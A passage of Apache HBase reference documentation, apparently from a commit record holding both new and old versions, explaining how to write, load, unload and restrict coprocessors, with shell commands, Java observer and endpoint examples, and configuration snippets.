Dynamic Loading\n\nYou can also load a coprocessor dynamically, without restarting HBase. This may seem\npreferable to static loading, but dynamically loaded coprocessors are loaded on a\nper-table basis, and are only available to the table for which they were loaded. For\nthis reason, dynamically loaded tables are sometimes called *Table Coprocessor*.\n\nIn addition, dynamically loading a coprocessor acts as a schema change on the table,\nand the table must be taken offline to load the coprocessor.\n\nThere are three ways to dynamically load Coprocessor.\n\n[NOTE]\n.Assumptions\n====\nThe below mentioned instructions makes the following assumptions:\n\n* A JAR called `coprocessor.jar` contains the Coprocessor implementation along with all of its\ndependencies.\n* The JAR is available in HDFS in some location like\n`hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar`.\n====\n\n[[load_coprocessor_in_shell]]\n==== Using HBase Shell\n\n. Load the Coprocessor, using a command like the following:\n+\n[source]\n----\nhbase alter 'users', METHOD => 'table_att', 'Coprocessor'=>'hdfs:\/\/<namenode>:<port>\/\nuser\/<hadoop-user>\/coprocessor.jar| org.myname.hbase.Coprocessor.RegionObserverExample|1073741823|\narg1=1,arg2=2'\n----\n+\nThe Coprocessor framework will try to read the class information from the coprocessor table\nattribute value.\nThe value contains four pieces of information which are separated by the pipe (`|`) character.\n+\n* File path: The jar file containing the Coprocessor implementation must be in a location where\nall region servers can read it. +\nYou could copy the file onto the local disk on each region server, but it is recommended to store\nit in HDFS. +\nhttps:\/\/issues.apache.org\/jira\/browse\/HBASE-14548[HBASE-14548] allows a directory containing the jars\nor some wildcards to be specified, such as: hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/ or\nhdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/*.jar. Please note that if a directory is specified,\nall jar files(.jar) in the directory are added. It does not search for files in sub-directories.\nDo not use a wildcard if you would like to specify a directory. This enhancement applies to the\nusage via the JAVA API as well.\n* Class name: The full class name of the Coprocessor.\n* Priority: An integer. The framework will determine the execution sequence of all configured\nobservers registered at the same hook using priorities. This field can be left blank. In that\ncase the framework will assign a default priority value.\n* Arguments (Optional): This field is passed to the Coprocessor implementation. This is optional.\n\n. Verify that the coprocessor loaded:\n+\n----\nhbase(main):04:0> describe 'users'\n----\n+\nThe coprocessor should be listed in the `TABLE_ATTRIBUTES`.\n\n==== Using the Java API (all HBase versions)\n\nThe following Java code shows how to use the `setValue()` method of `HTableDescriptor`\nto load a coprocessor on the `users` table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.setValue(\"COPROCESSOR$1\", path + \"|\"\n+ RegionObserverExample.class.getCanonicalName() + \"|\"\n+ Coprocessor.PRIORITY_USER);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\n==== Using the Java API (HBase 0.96+ only)\n\nIn HBase 0.96 and newer, the `addCoprocessor()` method of `HTableDescriptor` provides\nan easier way to load a coprocessor dynamically.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nPath path = new Path(\"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\");\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.addCoprocessor(RegionObserverExample.class.getCanonicalName(), path,\nCoprocessor.PRIORITY_USER, null);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nWARNING: There is no guarantee that the framework will load a given Coprocessor successfully.\nFor example, the shell command neither guarantees a jar file exists at a particular location nor\nverifies whether the given class is actually contained in the jar file.\n\n\n=== Dynamic Unloading\n\n==== Using HBase Shell\n\n. Alter the table to remove the coprocessor with `table_att_unset`.\n+\n[source]\n----\nhbase> alter 'users', METHOD => 'table_att_unset', NAME => 'coprocessor$1'\n----\n\n. Alter the table to remove the coprocessor with `table_remove_coprocessor` introduced in\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-26524[HBASE-26524] by specifying an explicit\nclassname\n+\n[source]\n----\nhbase> alter 'users', METHOD => 'table_remove_coprocessor', CLASSNAME =>\n 'org.myname.hbase.Coprocessor.RegionObserverExample'\n----\n\n\n==== Using the Java API\n\nReload the table definition without setting the value of the coprocessor either by\nusing `setValue()` or `addCoprocessor()` methods. This will remove any coprocessor\nattached to the table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nIn HBase 0.96 and newer, you can instead use the `removeCoprocessor()` method of the\n`HTableDescriptor` class.\n\n\n[[cp_example]]\n== Examples\nHBase ships examples for Observer Coprocessor.\n\nA more detailed example is given below.\n\nThese examples assume a table called `users`, which has two column families `personalDet`\nand `salaryDet`, containing personal and salary details. Below is the graphical representation\nof the `users` table.\n\n.Users Table\n[width=\"100%\",cols=\"7\",options=\"header,footer\"]\n|====================\n| 3+|personalDet 3+|salaryDet\n|*rowkey* |*name* |*lastname* |*dob* |*gross* |*net* |*allowances*\n|admin |Admin |Admin | 3+|\n|cdickens |Charles |Dickens |02\/07\/1812 |10000 |8000 |2000\n|jverne |Jules |Verne |02\/08\/1828 |12000 |9000 |3000\n|====================\n\n\n=== Observer Example\n\nThe following Observer coprocessor prevents the details of the user `admin` from being\nreturned in a `Get` or `Scan` of the `users` table.\n\n. Write a class that implements the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionCoprocessor.html[RegionCoprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver]\nclass.\n\n. Override the `preGetOp()` method (the `preGet()` method is deprecated) to check\nwhether the client has queried for the rowkey with value `admin`. If so, return an\nempty result. Otherwise, process the request as normal.\n\n. Put your code and dependencies in a JAR file.\n\n. Place the JAR in HDFS where HBase can locate it.\n\n. Load the Coprocessor.\n\n. Write a simple program to test it.\n\nFollowing are the implementation of the above steps:\n\n[source,java]\n----\npublic class RegionObserverExample implements RegionCoprocessor, RegionObserver {\n\n private static final byte[] ADMIN = Bytes.toBytes(\"admin\");\n private static final byte[] COLUMN_FAMILY = Bytes.toBytes(\"details\");\n private static final byte[] COLUMN = Bytes.toBytes(\"Admin_det\");\n private static final byte[] VALUE = Bytes.toBytes(\"You can't see Admin details\");\n\n @Override\n public Optional<RegionObserver> getRegionObserver() {\n return Optional.of(this);\n }\n\n @Override\n public void preGetOp(final ObserverContext<RegionCoprocessorEnvironment> e, final Get get, final List<Cell> results)\n throws IOException {\n\n if (Bytes.equals(get.getRow(),ADMIN)) {\n Cell c = CellUtil.createCell(get.getRow(),COLUMN_FAMILY, COLUMN,\n System.currentTimeMillis(), (byte)4, VALUE);\n results.add(c);\n e.bypass();\n }\n }\n}\n----\n\nOverriding the `preGetOp()` will only work for `Get` operations. You also need to override\nthe `preScannerOpen()` method to filter the `admin` row from scan results.\n\n[source,java]\n----\n@Override\npublic RegionScanner preScannerOpen(final ObserverContext<RegionCoprocessorEnvironment> e, final Scan scan,\nfinal RegionScanner s) throws IOException {\n\n Filter filter = new RowFilter(CompareOp.NOT_EQUAL, new BinaryComparator(ADMIN));\n scan.setFilter(filter);\n return s;\n}\n----\n\nThis method works but there is a _side effect_. If the client has used a filter in\nits scan, that filter will be replaced by this filter. Instead, you can explicitly\nremove any `admin` results from the scan:\n\n[source,java]\n----\n@Override\npublic boolean postScannerNext(final ObserverContext<RegionCoprocessorEnvironment> e, final InternalScanner s,\nfinal List<Result> results, final int limit, final boolean hasMore) throws IOException {\n\tResult result = null;\n Iterator<Result> iterator = results.iterator();\n while (iterator.hasNext()) {\n result = iterator.next();\n if (Bytes.equals(result.getRow(), ROWKEY)) {\n iterator.remove();\n break;\n }\n }\n return hasMore;\n}\n----\n\n=== Endpoint Example\n\nStill using the `users` table, this example implements a coprocessor to calculate\nthe sum of all employee salaries, using an endpoint coprocessor.\n\n. Create a '.proto' file defining your service.\n+\n[source]\n----\noption java_package = \"org.myname.hbase.coprocessor.autogenerated\";\noption java_outer_classname = \"Sum\";\noption java_generic_services = true;\noption java_generate_equals_and_hash = true;\noption optimize_for = SPEED;\nmessage SumRequest {\n required string family = 1;\n required string column = 2;\n}\n\nmessage SumResponse {\n required int64 sum = 1 [default = 0];\n}\n\nservice SumService {\n rpc getSum(SumRequest)\n returns (SumResponse);\n}\n----\n\n. Execute the `protoc` command to generate the Java code from the above .proto' file.\n+\n[source]\n----\n$ mkdir src\n$ protoc --java_out=src .\/sum.proto\n----\n+\nThis will generate a class call `Sum.java`.\n\n. Write a class that extends the generated service class, implement the `Coprocessor`\nand `CoprocessorService` classes, and override the service method.\n+\nWARNING: If you load a coprocessor from `hbase-site.xml` and then load the same coprocessor\nagain using HBase Shell, it will be loaded a second time. The same class will\nexist twice, and the second instance will have a higher ID (and thus a lower priority).\nThe effect is that the duplicate coprocessor is effectively ignored.\n+\n[source, java]\n----\npublic class SumEndPoint extends Sum.SumService implements Coprocessor, CoprocessorService {\n\n private RegionCoprocessorEnvironment env;\n\n @Override\n public Service getService() {\n return this;\n }\n\n @Override\n public void start(CoprocessorEnvironment env) throws IOException {\n if (env instanceof RegionCoprocessorEnvironment) {\n this.env = (RegionCoprocessorEnvironment)env;\n } else {\n throw new CoprocessorException(\"Must be loaded on a table region!\");\n }\n }\n\n @Override\n public void stop(CoprocessorEnvironment env) throws IOException {\n \/\/ do nothing\n }\n\n @Override\n public void getSum(RpcController controller, Sum.SumRequest request, RpcCallback<Sum.SumResponse> done) {\n Scan scan = new Scan();\n scan.addFamily(Bytes.toBytes(request.getFamily()));\n scan.addColumn(Bytes.toBytes(request.getFamily()), Bytes.toBytes(request.getColumn()));\n\n Sum.SumResponse response = null;\n InternalScanner scanner = null;\n\n try {\n scanner = env.getRegion().getScanner(scan);\n List<Cell> results = new ArrayList<>();\n boolean hasMore = false;\n long sum = 0L;\n\n do {\n hasMore = scanner.next(results);\n for (Cell cell : results) {\n sum = sum + Bytes.toLong(CellUtil.cloneValue(cell));\n }\n results.clear();\n } while (hasMore);\n\n response = Sum.SumResponse.newBuilder().setSum(sum).build();\n } catch (IOException ioe) {\n ResponseConverter.setControllerException(controller, ioe);\n } finally {\n if (scanner != null) {\n try {\n scanner.close();\n } catch (IOException ignored) {}\n }\n }\n\n done.run(response);\n }\n}\n----\n+\n[source, java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nfinal Sum.SumRequest request = Sum.SumRequest.newBuilder().setFamily(\"salaryDet\").setColumn(\"gross\").build();\ntry {\n Map<byte[], Long> results = table.coprocessorService(\n Sum.SumService.class,\n null, \/* start key *\/\n null, \/* end key *\/\n new Batch.Call<Sum.SumService, Long>() {\n @Override\n public Long call(Sum.SumService aggregate) throws IOException {\n BlockingRpcCallback<Sum.SumResponse> rpcCallback = new BlockingRpcCallback<>();\n aggregate.getSum(null, request, rpcCallback);\n Sum.SumResponse response = rpcCallback.get();\n\n return response.hasSum() ? response.getSum() : 0L;\n }\n }\n );\n\n for (Long sum : results.values()) {\n System.out.println(\"Sum = \" + sum);\n }\n} catch (ServiceException e) {\n e.printStackTrace();\n} catch (Throwable e) {\n e.printStackTrace();\n}\n----\n\n. Load the Coprocessor.\n\n. Write a client code to call the Coprocessor.\n\n\n== Guidelines For Deploying A Coprocessor\n\nBundling Coprocessors::\n You can bundle all classes for a coprocessor into a\n single JAR on the RegionServer's classpath, for easy deployment. Otherwise,\n place all dependencies on the RegionServer's classpath so that they can be\n loaded during RegionServer start-up. The classpath for a RegionServer is set\n in the RegionServer's `hbase-env.sh` file.\nAutomating Deployment::\n You can use a tool such as Puppet, Chef, or\n Ansible to ship the JAR for the coprocessor to the required location on your\n RegionServers' filesystems and restart each RegionServer, to automate\n coprocessor deployment. Details for such set-ups are out of scope of this\n document.\nUpdating a Coprocessor::\n Deploying a new version of a given coprocessor is not as simple as disabling it,\n replacing the JAR, and re-enabling the coprocessor. This is because you cannot\n reload a class in a JVM unless you delete all the current references to it.\n Since the current JVM has reference to the existing coprocessor, you must restart\n the JVM, by restarting the RegionServer, in order to replace it. This behavior\n is not expected to change.\nCoprocessor Logging::\n The Coprocessor framework does not provide an API for logging beyond standard Java\n logging.\nCoprocessor Configuration::\n If you do not want to load coprocessors from the HBase Shell, you can add their configuration\n properties to `hbase-site.xml`. In <<load_coprocessor_in_shell>>, two arguments are\n set: `arg1=1,arg2=2`. These could have been added to `hbase-site.xml` as follows:\n[source,xml]\n----\n<property>\n <name>arg1<\/name>\n <value>1<\/value>\n<\/property>\n<property>\n <name>arg2<\/name>\n <value>2<\/value>\n<\/property>\n----\nThen you can read the configuration using code like the following:\n[source,java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nGet get = new Get(Bytes.toBytes(\"admin\"));\nResult result = table.get(get);\nfor (Cell c : result.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \"==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \"{\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c)) + \"}\");\n}\nScan scan = new Scan();\nResultScanner scanner = table.getScanner(scan);\nfor (Result res : scanner) {\n for (Cell c : res.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \" ==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \" {\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c))\n + \"}\");\n }\n}\n----\n\n== Restricting Coprocessor Usage\n\nRestricting arbitrary user coprocessors can be a big concern in multitenant environments. HBase provides a continuum of options for ensuring only expected coprocessors are running:\n\n- `hbase.coprocessor.enabled`: Enables or disables all coprocessors. This will limit the functionality of HBase, as disabling all coprocessors will disable some security providers. An example coproccessor so affected is `org.apache.hadoop.hbase.security.access.AccessController`.\n* `hbase.coprocessor.user.enabled`: Enables or disables loading coprocessors on tables (i.e. user coprocessors).\n* One can statically load coprocessors, and optionally tune their priorities, via the following tunables in `hbase-site.xml`:\n** `hbase.coprocessor.regionserver.classes`: A comma-separated list of coprocessors that are loaded by region servers\n** `hbase.coprocessor.region.classes`: A comma-separated list of RegionObserver and Endpoint coprocessors\n** `hbase.coprocessor.user.region.classes`: A comma-separated list of coprocessors that are loaded by all regions\n** `hbase.coprocessor.master.classes`: A comma-separated list of coprocessors that are loaded by the master (MasterObserver coprocessors)\n** `hbase.coprocessor.wal.classes`: A comma-separated list of WALObserver coprocessors to load\n* `hbase.coprocessor.abortonerror`: Whether to abort the daemon which has loaded the coprocessor if the coprocessor should error other than `IOError`. If this is set to false and an access controller coprocessor should have a fatal error the coprocessor will be circumvented, as such in secure installations this is advised to be `true`; however, one may override this on a per-table basis for user coprocessors, to ensure they do not abort their running region server and are instead unloaded on error.\n* `hbase.coprocessor.region.whitelist.paths`: A comma separated list available for those loading `org.apache.hadoop.hbase.security.access.CoprocessorWhitelistMasterObserver` whereby one can use the following options to white-list paths from which coprocessors may be loaded.\n** Coprocessors on the classpath are implicitly white-listed\n** `*` to wildcard all coprocessor paths\n** An entire filesystem (e.g. `hdfs:\/\/my-cluster\/`)\n** A wildcard path to be evaluated by link:https:\/\/commons.apache.org\/proper\/commons-io\/javadocs\/api-release\/org\/apache\/commons\/io\/FilenameUtils.html[FilenameUtils.wildcardMatch]\n** Note: Path can specify scheme or not (e.g. `file:\/\/\/usr\/hbase\/lib\/coprocessors` or for all filesystems `\/usr\/hbase\/lib\/coprocessors`)\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[cp]]\n= Apache HBase Coprocessors\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nHBase Coprocessors are modeled after Google BigTable's coprocessor implementation\n(http:\/\/research.google.com\/people\/jeff\/SOCC2010-keynote-slides.pdf pages 41-42.).\n\nThe coprocessor framework provides mechanisms for running your custom code directly on\nthe RegionServers managing your data. Efforts are ongoing to bridge gaps between HBase's\nimplementation and BigTable's architecture. For more information see\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n\nThe information in this chapter is primarily sourced and heavily reused from the following\nresources:\n\n. Mingjie Lai's blog post\nlink:https:\/\/blogs.apache.org\/hbase\/entry\/coprocessor_introduction[Coprocessor Introduction].\n. Gaurav Bhardwaj's blog post\nlink:http:\/\/www.3pillarglobal.com\/insights\/hbase-coprocessors[The How To Of HBase Coprocessors].\n\n[WARNING]\n.Use Coprocessors At Your Own Risk\n====\nCoprocessors are an advanced feature of HBase and are intended to be used by system\ndevelopers only. Because coprocessor code runs directly on the RegionServer and has\ndirect access to your data, they introduce the risk of data corruption, man-in-the-middle\nattacks, or other malicious data access. Currently, there is no mechanism to prevent\ndata corruption by coprocessors, though work is underway on\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n+\nIn addition, there is no resource isolation, so a well-intentioned but misbehaving\ncoprocessor can severely degrade cluster performance and stability.\n====\n\n== Coprocessor Overview\n\nIn HBase, you fetch data using a `Get` or `Scan`, whereas in an RDBMS you use a SQL\nquery. In order to fetch only the relevant data, you filter it using a HBase\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/filter\/Filter.html[Filter]\n, whereas in an RDBMS you use a `WHERE` predicate.\n\nAfter fetching the data, you perform computations on it. This paradigm works well\nfor \"small data\" with a few thousand rows and several columns. However, when you scale\nto billions of rows and millions of columns, moving large amounts of data across your\nnetwork will create bottlenecks at the network layer, and the client needs to be powerful\nenough and have enough memory to handle the large amounts of data and the computations.\nIn addition, the client code can grow large and complex.\n\nIn this scenario, coprocessors might make sense. You can put the business computation\ncode into a coprocessor which runs on the RegionServer, in the same location as the\ndata, and returns the result to the client.\n\nThis is only one scenario where using coprocessors can provide benefit. Following\nare some analogies which may help to explain some of the benefits of coprocessors.\n\n[[cp_analogies]]\n=== Coprocessor Analogies\n\nTriggers and Stored Procedure::\n An Observer coprocessor is similar to a trigger in a RDBMS in that it executes\n your code either before or after a specific event (such as a `Get` or `Put`)\n occurs. An endpoint coprocessor is similar to a stored procedure in a RDBMS\n because it allows you to perform custom computations on the data on the\n RegionServer itself, rather than on the client.\n\nMapReduce::\n MapReduce operates on the principle of moving the computation to the location of\n the data. Coprocessors operate on the same principal.\n\nAOP::\n If you are familiar with Aspect Oriented Programming (AOP), you can think of a coprocessor\n as applying advice by intercepting a request and then running some custom code,\n before passing the request on to its final destination (or even changing the destination).\n\n\n=== Coprocessor Implementation Overview\n\n. Your class should implement one of the Coprocessor interfaces -\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/Coprocessor.html[Coprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/CoprocessorService.html[CoprocessorService] - to name a few.\n\n. Load the coprocessor, either statically (from the configuration) or dynamically,\nusing HBase Shell. For more details see <<cp_loading,Loading Coprocessors>>.\n\n. Call the coprocessor from your client-side code. HBase handles the coprocessor\ntransparently.\n\nThe framework API is provided in the\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/package-summary.html[coprocessor]\npackage.\n\n== Types of Coprocessors\n\n=== Observer Coprocessors\n\nObserver coprocessors are triggered either before or after a specific event occurs.\nObservers that happen before an event use methods that start with a `pre` prefix,\nsuch as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#prePut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`prePut`]. Observers that happen just after an event override methods that start\nwith a `post` prefix, such as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#postPut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`postPut`].\n\n\n==== Use Cases for Observer Coprocessors\nSecurity::\n Before performing a `Get` or `Put` operation, you can check for permission using\n `preGet` or `prePut` methods.\n\nReferential Integrity::\n HBase does not directly support the RDBMS concept of refential integrity, also known\n as foreign keys. You can use a coprocessor to enforce such integrity. For instance,\n if you have a business rule that every insert to the `users` table must be followed\n by a corresponding entry in the `user_daily_attendance` table, you could implement\n a coprocessor to use the `prePut` method on `user` to insert a record into `user_daily_attendance`.\n\nSecondary Indexes::\n You can use a coprocessor to maintain secondary indexes. For more information, see\n link:https:\/\/cwiki.apache.org\/confluence\/display\/HADOOP2\/Hbase+SecondaryIndexing[SecondaryIndexing].\n\n\n==== Types of Observer Coprocessor\n\nRegionObserver::\n A RegionObserver coprocessor allows you to observe events on a region, such as `Get`\n and `Put` operations. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver].\n\nRegionServerObserver::\n A RegionServerObserver allows you to observe events related to the RegionServer's\n operation, such as starting, stopping, or performing merges, commits, or rollbacks.\n See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionServerObserver.html[RegionServerObserver].\n\nMasterObserver::\n A MasterObserver allows you to observe events related to the HBase Master, such\n as table creation, deletion, or schema modification. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/MasterObserver.html[MasterObserver].\n\nWalObserver::\n A WalObserver allows you to observe events related to writes to the Write-Ahead\n Log (WAL). See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/WALObserver.html[WALObserver].\n\n<<cp_example,Examples>> provides working examples of observer coprocessors.\n\n\n\n[[cpeps]]\n=== Endpoint Coprocessor\n\nEndpoint processors allow you to perform computation at the location of the data.\nSee <<cp_analogies, Coprocessor Analogy>>. An example is the need to calculate a running\naverage or summation for an entire table which spans hundreds of regions.\n\nIn contrast to observer coprocessors, where your code is run transparently, endpoint\ncoprocessors must be explicitly invoked using the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html#coprocessorService-java.util.function.Function-org.apache.hadoop.hbase.client.ServiceCaller-byte:A-[CoprocessorService()]\nmethod available in\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html[AsyncTable].\n\n[WARNING]\n.On using coprocessorService method with sync client\n====\nThe coprocessorService method in link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table]\nhas been deprecated.\n\nIn link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-21512[HBASE-21512]\nwe reimplement the sync client based on the async client. The coprocessorService\nmethod defined in `Table` interface directly references a method from protobuf's\n`BlockingInterface`, which means we need to use a separate thread pool to execute\nthe method so we avoid blocking the async client(We want to avoid blocking calls in\nour async implementation).\n\nSince coprocessor is an advanced feature, we believe it is OK for coprocessor users to\ninstead switch over to use `AsyncTable`. There is a lightweight\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Connection.html#toAsyncConnection--[toAsyncConnection]\nmethod to get an `AsyncConnection` from `Connection` if needed.\n====\n\nStarting with HBase 0.96, endpoint coprocessors are implemented using Google Protocol\nBuffers (protobuf). For more details on protobuf, see Google's\nlink:https:\/\/developers.google.com\/protocol-buffers\/docs\/proto[Protocol Buffer Guide].\nEndpoints Coprocessor written in version 0.94 are not compatible with version 0.96 or later.\nSee\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5448[HBASE-5448]). To upgrade your\nHBase cluster from 0.94 or earlier to 0.96 or later, you need to reimplement your\ncoprocessor.\n\nIn HBase 2.x, we made use of a shaded version of protobuf 3.x, but kept the\nprotobuf for coprocessors on 2.5.0. In HBase 3.0.0, we removed all dependencies on\nnon-shaded protobuf so you need to reimplement your coprocessor to make use of the\nshaded protobuf version provided in hbase-thirdparty. Please see\nthe <<protobuf,protobuf>> section for more details.\n\nCoprocessor Endpoints should make no use of HBase internals and\nonly avail of public APIs; ideally a CPEP should depend on Interfaces\nand data structures only. This is not always possible but beware\nthat doing so makes the Endpoint brittle, liable to breakage as HBase\ninternals evolve. HBase internal APIs annotated as private or evolving\ndo not have to respect semantic versioning rules or general java rules on\ndeprecation before removal. While generated protobuf files are\nabsent the hbase audience annotations -- they are created by the\nprotobuf protoc tool which knows nothing of how HBase works --\nthey should be consided `@InterfaceAudience.Private` so are liable to\nchange.\n\n<<cp_example,Examples>> provides working examples of endpoint coprocessors.\n\n[[cp_loading]]\n== Loading Coprocessors\n\nTo make your coprocessor available to HBase, it must be _loaded_, either statically\n(through the HBase configuration) or dynamically (using HBase Shell or the Java API).\n\n=== Static Loading\n\nFollow these steps to statically load your coprocessor. Keep in mind that you must\nrestart HBase to unload a coprocessor that has been loaded statically.\n\n. Define the Coprocessor in _hbase-site.xml_, with a <property> element with a <name>\nand a <value> sub-element. The <name> should be one of the following:\n+\n- `hbase.coprocessor.region.classes` for RegionObservers and Endpoints.\n- `hbase.coprocessor.wal.classes` for WALObservers.\n- `hbase.coprocessor.master.classes` for MasterObservers.\n+\n<value> must contain the fully-qualified class name of your coprocessor's implementation\nclass.\n+\nFor example to load a Coprocessor (implemented in class SumEndPoint.java) you have to create\nfollowing entry in RegionServer's 'hbase-site.xml' file (generally located under 'conf' directory):\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint<\/value>\n<\/property>\n----\n+\nIf multiple classes are specified for loading, the class names must be comma-separated.\nThe framework attempts to load all the configured classes using the default class loader.\nTherefore, the jar file must reside on the server-side HBase classpath.\n\n+\nCoprocessors which are loaded in this way will be active on all regions of all tables.\nThese are also called system Coprocessor.\nThe first listed Coprocessors will be assigned the priority `Coprocessor.Priority.SYSTEM`.\nEach subsequent coprocessor in the list will have its priority value incremented by one (which\nreduces its priority, because priorities have the natural sort order of Integers).\n\n+\nThese priority values can be manually overriden in hbase-site.xml. This can be useful if you\nwant to guarantee that a coprocessor will execute after another. For example, in the following\nconfiguration `SumEndPoint` would be guaranteed to go last, except in the case of a tie with\nanother coprocessor:\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint|2147483647<\/value>\n<\/property>\n----\n\n+\nWhen calling out to registered observers, the framework executes their callbacks methods in the\nsorted order of their priority. +\nTies are broken arbitrarily.\n\n. Put your code on HBase's classpath. One easy way to do this is to drop the jar\n (containing you code and all the dependencies) into the `lib\/` directory in the\n HBase installation.\n\n. Restart HBase.\n\n\n=== Static Unloading\n\n. Delete the coprocessor's <property> element, including sub-elements, from `hbase-site.xml`.\n. Restart HBase.\n. Optionally, remove the coprocessor's JAR file from the classpath or HBase's `lib\/`\n directory.\n\n\n=== Dynamic Loading\n\nYou can also load a coprocessor dynamically, without restarting 